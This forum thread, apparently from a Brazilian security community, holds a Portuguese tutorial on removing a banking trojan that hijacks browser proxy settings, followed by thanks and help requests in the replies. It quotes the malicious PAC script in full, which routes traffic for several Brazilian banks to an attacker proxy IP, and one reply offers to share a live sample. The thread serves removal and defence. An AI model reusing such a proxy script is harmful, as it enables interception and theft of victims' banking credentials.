Ir para conteúdo

Foto

[TUT]Vírus Através de AutoProxy |Veja Como Retirar


  • Por favor, faça o login para responder
8 respostas neste tópico

#1
DraKiNs

DraKiNs

    Novato

  • Novato
  • Pip
  • 3 posts

Imagem Postada
Por DraKiNs


Bom primeiramente olá a todos a algum tempo não vinha com novos tutoriais até porque não tenho idéa o que posso fazer,vou postar aqui um

Tutorial de como remover um Vírus de Proxy automatica que hackers Brasileiros andam usando,lembrando que nenhum anti-vírus foi capaz de

detectar este maldito..

DETECTANDO:
Bom o vírus é extremamente fácil de pegar,pode pega-lo até pelo navegador através de um Javascript que fizeram para mudar as cofigurações

do registro..

INICIAR
PAINEL DE CONTROLE
OPÇÕES DA INTERNET
Aba CONEXÕES
CONFIGURAÇÕES DA LAN

Você verá algo parecido com Isto:
Imagem Postada

Bom caso você esteja infectado é provável que aparece uma Proxy no local Endereço,caso realmente estiver pegue aquela URL cole no

navegador e entre na pagina,verá um código JS parecido com Esse:

function FindProxyForURL(url, host)
{
var a = "PROXY 94.103.152.250:8083";
  if (shExpMatch(host, "www.unibanco.com.br")) {
     return a;
}
  if (shExpMatch(host, "unibanco.com.br")) {
     return a;
}
  if (shExpMatch(host, "www.bradesco.com.br")) {
     return a;
}
  if (shExpMatch(host, "bradesco.com.br")) {
     return a;
}
  if (shExpMatch(host, "bradescoprime.com.br")) {
     return a;
}
  if (shExpMatch(host, "www.bradescoprime.com.br")) {
     return a;
}
  if (shExpMatch(host, "www.santander.com.br")) {
     return a;
}
  if (shExpMatch(host, "santander.com.br")) {
     return a;
}
  if (shExpMatch(host, "www.santanderbanespa.com.br")) {
     return a;
}
 if (shExpMatch(host, "www.banespa.com.br")) {
     return a;
}
 if (shExpMatch(host, "banespa.com.br")) {
     return a;
}
 if (shExpMatch(host, "www.itau.com.br")) {
     return a;
}
 if (shExpMatch(host, "itau.com.br")) {
     return a;
}
if (shExpMatch(host, "real.com.br")) {
     return a;
}
if (shExpMatch(host, "bancoreal.com.br")) {
     return a;
}
if (shExpMatch(host, "www.real.com.br")) {
     return a;
}
if (shExpMatch(host, "www.bancoreal.com.br")) {
     return a;
}

return "DIRECT";
}

Como podem ver ao o JS achar uma Pagina de banco redireciona a uma Falsa caso você estiver com esta pagina faça o processedimento

abaixo e claro denuncie a DNS e o IP que tem esse código malicioso

REMOVENDO
Bom para remover é realmente chato,mesmo assim vou tentar dar um explicada Rapida..

INICIAR
EXECUTAR
Digite REGEDIT
Lá tera as Opções de Registro pegue e navegue até a chave:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings

Clicando na Chave Internet Settings,terá alguns Registro procure pelo registro no qual tem o valor da Prox Infectada,isto é
Caso tenha o a Proxy Exemplo: "dns.cache.org" você deverá procurar algo do tipo dentro desta Chave
Após encontrar exclua esta chave,não haverá efeitos colaterais até porque o Windows Recria ela novamente..

Após todo esse Processo vá novamente em:

INICIAR
EXECUTAR
Digite: %UserProfile%
Abrirá uma Pasta dentro desta pasta procure por um desses arquivos

internetmodule.dll
networkmap.dll
sysquery.dll
systemmap.dll
undersystem.dll
userprofile.dll
winprocess32.dll
winupdate32.dll

Delete-os,normalmente eles estarão sendo usado pelo run32.dll simplesmente baixe o Unlocker
http://www.baixaki.c...ad/unlocker.htm
E Clique com botão direito no arquivo UNLOCKER e escolha a Opção deletar..

Logo Após fazer isso baixe a ferramenta BankerFix da comunidade LinhaDefensiva

http://www.linhadefe...rg/dl/bankerfix

Abra ele e Feche todos programas executados no momento,deixe ele aberto e siga os passos clicando Enter em questão de 2 (dois) minutos ele dará como processo executado..
Reinicie o Computador e volte feliz sem esse Trojan chato que rouba informações,fiquei por 1 semana com ele em meu computador,sorte que o banco de minha mãe é o Banrisul,rs..
Obrigado a todos qualquer dúvida poste Abaixo,Agradecer não custa Nada

Agradecimentos à:

http://www.linhadefe...ies-maliciosos/
http://threatpost.co...avegador-040910

Grato..

Att: DraKiNs

P.S: Desculpa se postei na área errada,a proposito o BankerFix não remove o Vírus

#2
Einstein

Einstein

    ARIS-LD/Analista Senior

  • ARIS-LD
  • 10.266 posts
  • Sexo:Masculino
  • Local:SP, Brasil
DraKiNs

Obrigado pelo tutorial, realmente muito bom e detalhado.

O Bankerfix já está atualizado para remover a maioria dos proxies maliciosos conhecidos. Porém novos servidores maliciosos e DLLs aparecem todos os dias.

Há outras variantes desse golpe, devemos detalhar isso futuramente num artigo. Mesmo assim, nossa equipe está constantemente discutindo essas novas formas de infecção usadas por bankers brasileiros para bem atender e resolver os problemas dos usuários que nos procuram.

Grato!

#3
DraKiNs

DraKiNs

    Novato

  • Novato
  • Pip
  • 3 posts
Eisten,

Muito obrigado por ter gostado do Tutorial é um prazer para mim,
Ontem fui infectado pelo arquivo,tentei usar o BankerFix e infelizmente não obtive resultados pois ele não conseguia remover a DLL,mesmo assim obrigado e espero que Atualizem o mais rápido

DraKoN..

#4
4PR3ND1ZT3CH

4PR3ND1ZT3CH

    Novato

  • Novato
  • Pip
  • 14 posts
Muito bom o tutorial. Excelente, valeu.

#5
gasparjr

gasparjr

    Novato

  • Novato
  • Pip
  • 23 posts
  • Sexo:Masculino
Tentei o procedimento descrito (INICIAR>EXECUTAR>Digite: %UserProfile%), no entanto, não obtive êxito em encontrar a pasta.

Utilizo o Vista Home Basic e o procedimento acima retornou uma pasta em meus documentos com arquivos de instalação da minha webcam (que é fixa no meu notebook e já veio instalada).

Por gentileza, gostaria de outro meio para encontrá-la.

Editado por gasparjr, 22 novembro 2010 - 15:10.


#6
gasparjr

gasparjr

    Novato

  • Novato
  • Pip
  • 23 posts
  • Sexo:Masculino
Correção.

Fiz o procedimento abaixo:

Após todo esse Processo vá novamente em:

INICIAR
EXECUTAR
Digite: %UserProfile%
Abrirá uma Pasta dentro desta pasta procure por um desses arquivos



O resultado é a pasta com meus documentos. Mesmo ativando a opção de visualizar pastas e arquivos ocultos e protegidos do sistema operacional não achei nenhuma pasta que tivesse as dlls mencionadas.

Poderia por gentileza me passar o caminho completo?

#7
Einstein

Einstein

    ARIS-LD/Analista Senior

  • ARIS-LD
  • 10.266 posts
  • Sexo:Masculino
  • Local:SP, Brasil
OLá gasparjr

Claro, podemos lhe ajudar!

Por gentileza siga essas instruções:
http://linhadefensiv...emocao-de-virus

Crie seu log com o HijackThis e poste-o para análise nessa área >>> http://www.linhadefe...hp?showforum=11

#8
gasparjr

gasparjr

    Novato

  • Novato
  • Pip
  • 23 posts
  • Sexo:Masculino
Obrigado pela presteza e atenção. Vou providenciar o log mencionado. Parabéns pelo tutorial, excelente.

#9
Anderson Davilla

Anderson Davilla

    Novato

  • Novato
  • Pip
  • 1 posts
Olá amigo DraKiNs, acabei de tirar este vírus da minha maquina só que agora ele esta mais aprimorado, ele esta sem as dll's aqui esta á página do script js que você mencionou ---> http://www.growingfa...els/contact.txt valeu pessoal a partir de hoje também vou ajudar aqui no fórum com o meu conhecimento, obrigado. Estou com o vírus guardado, este vírus veio como se fosse um comprovante de deposito bancário veio como uma imagem porém é um executável, se alguém quiser analisa-lo estou a disposição, posso disponibiliza-lo, assim que alguém responder a este fórum receberei um email e logarei aqui no fórum.

Mais uma vez obrigado,

Anderson Davilla.

Editado por Anderson Davilla, 03 março 2012 - 18:41.





0 usuário(s) está(ão) lendo este tópico

0 membros, 0 visitantes, 0 membros anônimos